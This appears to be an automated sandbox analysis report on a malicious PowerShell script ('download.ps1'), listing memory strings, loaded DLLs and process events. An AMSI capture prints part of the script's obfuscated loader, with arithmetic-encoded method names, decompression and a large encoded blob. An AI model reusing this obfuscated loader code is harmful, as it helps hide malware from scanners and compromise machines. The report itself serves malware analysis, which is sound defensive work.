href="https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source%3Dsmp.2023carterhpp.2%26stick%3DH4sIAAAAAAAA_zu04eRyNhYpJgGGW-cOnOVk4mAAAAs3vRsSAAAA&amp;source=hpp&amp;id=19046191&amp;ct=3&amp;usg=AOvVaw1DdLddPyaDlZCddFvNE2w3&amp;sa=X&amp;ved=0ahUKEwiUiuzVjNCKAxUrS_EDHf_FFr8Q8IcBCAY" rel="nofollow">President Jimmy Carter, 1924 - 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIAB
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BF97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzo3vy2q.3cb.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ery1u6abt8kzvqf.(([char[]]@((3701-(9328478/(5404-2837))),(-8432+8543),(1027824/(58182180/(7937680/1252))),(-3743+(2279760/(411+179))),(385140/4585),(-8417+(4072+4456))) -join ''))( $vb6t0ze4my3ul8f ) $ery1u6abt8kzvqf.(([char[]]@((102309/1527),(5611-(813+(12021-7331))),(-5490+(39055773/(7426245/(6928-5863)))),(-4277+(-4724+(5756+3360))),(2487-(21543194/9029))) -join ''))()$4zudplrcemfx0w9.(([char[]]@((-4099+(23287940/5590)),(488484/4523),(1090242/9822),(78315/(7943-(17363-10101))),(2686-2585)) -join ''))()[byte[]] $0s2eox1rbc3i5vz = $vb6t0ze4my3ul8f.((-join (@((6550-(3933+(14040419/(9486-(14596986/3702))))),(10060-(15412-(3608+1855))),(-7853+7918),(-7871+7985),(9071-8957),(451341/(-3976+8629)),(3378-3257))| ForEach-Object { [char]$_ })))() $3mqe4b7hsju19rc=$0s2eox1rbc3i5vz return $3mqe4b7hsju19rc}[System.Text.Encoding]::ascii.((-join (@((6421-(27273250/4295)),(628119/6219),(106+10),(-2238+2321),(4547-(-2888+7319)),(-2222+(15709600/6725)),(232260/2212),(-5970+6080),(-7910+8013))| ForEach-Object { [char]$_ })))((5irawk2dpqsbxzn61j3of79v80c "K+FyZHQ1bGhmMMrqb+VnswWw8ysiz4Y2VIZJDUNOs0dwuH8G1la/YpayUGAgcDVVRq7R4jdoToPd1zwjSew5Ntb9SPoi/sI5w7TPzyKYOT3PfwkLVpWkGozRlZUZf1mNwrTRI0trURaU1Imbx3W0e8iP1hCc3KaFUz2dWyhIEpOTZ0jITZqOlojeF3+VL9nKT5bNl9/Aszee2Z6lI8XUqlvKGh2N2rK9h1G9E5pAi5Cn+3gpavdF2YeCx6PpV2jJyIbJA5Pqc5caDMnPk9SKs2xYVf4wVw7XWN+NFQJDmu8B3dbAhHetVhZuDmBT2aAdewdUWfv7W03EhvFmnxRLA8feFo7ZAZW8iTk1L32AhPvLx9PQUtW0wfjr23ThXtT48HggbR2YyR0/7C3/p829PI9t4wGEojQYb+fHv4Z/97Lj3jIVnTYgIl3eXV5MfMTExP5pj/1mc9hntrvgLRmpkwO7h1+tH/lrUOBjAnlA90m6diFaRQszNavRMoIQ3Eojiga5CiB3RSODGtzWeHxlI5X/UjAC/BFnD3IxzxHFoYRLntTz8r3L600zp4O6WP5TAdFGgyqiMK6GK/lgU7cAzo5buLoh6B2ZdXV14Ynz4QXl4l7xGX2jk5ja61ddj5uhT2VkyQuIk6Wbs8y1e+1VekiPG5GH3ZhMyBYMEsBa0pCQ+1hoO61kDlmtRL5y062Xh/zUIaEvVdpwhjExRNn3uo5P8EG2rt9UslwJBkmpGGUcJEKGJxzk5pkAoKTfgYW6F9io/DJs4l2tqp+X4gkRGp+vvjSHdBLvB/JjXNmHyFjh6d4SCvIjh9xEAMUnhxhoGYOd3HvTtBLJVqSkXzUxT0Zvh3TfrGmx+jcEsC0FF46VZXAV2nac8o/hRd6i6pfX7mBEuLlqndTU9rWDz+4lhi9NswibayxPTlr+teMra4NYiFiLyp0dA+vpFpGf9bL1c62hM+OaoqccyoOgC5aOMnAqupsNP5Gdq2VFuQrNkO+pn/mLjLZHeC2cEErG5pfNIfWbZcfXr2PdG8RDFtrN14G9KZ0GZiQ+hdJmtizeRB4Mr3iYa/SlH4jMjY89TZ+hw/TGGIPcFe7IA0nECNSlF5lu9at0IFZVRbddI68/2uSTs/lz7i5sT+isqMLARXp2/lhud8KAOGsFiulqImh/zKW7lOLFveOnRdqj7HrLFROvSDZTbgGRRLC9JwQfrgoMUkDwnOCf8qi7FnvR1WZfAjSQGXZW1CdO3PPkbPLhrV4jhKWTxpscW/s1PK2Sgb5HxM7wh8Q+MFtN93NyJvN5penAR8hJPgeH+ATxfzNMI2FJltKFTZH2nJvDY2etT5uYn331SsqKF1ziz6jRIxFWe0o3tBNozKBY9UG4T+J3+J34usQWr8dWWZTW5tj626X8OfkRedRsfUrhTtX91QF2PaLngagi0qO3IFW/0AUtDqZmpOLaTxwWb0q0ELtcPOvF31p2SDUZ8GgFeA4fVPbbpFC8HHDCx5Ptg+x70Xenfe4JZYCmJ6Kr/+/bShJhdrsLv7llRWBrFvWhj+5qe8PPSx0PFn8PI2v/jHX6BRQIqsBYCdvZQ9rRwr7ClLpqueQ67ZvQa40WUr0IpeK9mNkfJGsZrsDX53pFl9hpwuEIbLzsqz9ArWnBw3lhTkfQH2lQ+1en5hJ/20hGvqB7bZP8VRMTS+7Ql1eGU0YLvJLFJAQu5n2PN7qF8+nQzOv+cZ7dhXIU/UiMDh9AkH7o866TqyAuRaQxyS30oS/5fW2tO0qpQsXfDD3S3heRsNldpo/1J7NK/+c91U6FIp0qfUaU8wHD6ftVcvckEMACOOeoR6bU1FPRLcsLKCmE+8v6O+9SmruKlLUSWopQitI+DM7gyZrT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb} source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbO source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1792982780.0000022F4278F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb364e35 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42C56000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B99D2A5 pushad ; iretd 0_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAB00BD pushad ; iretd 0_2_00007FFD9BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAB8E6C push es; iretd 0_2_00007FFD9BAB8F2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BD255EA push edx; retf 0_2_00007FFD9BD255EB

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
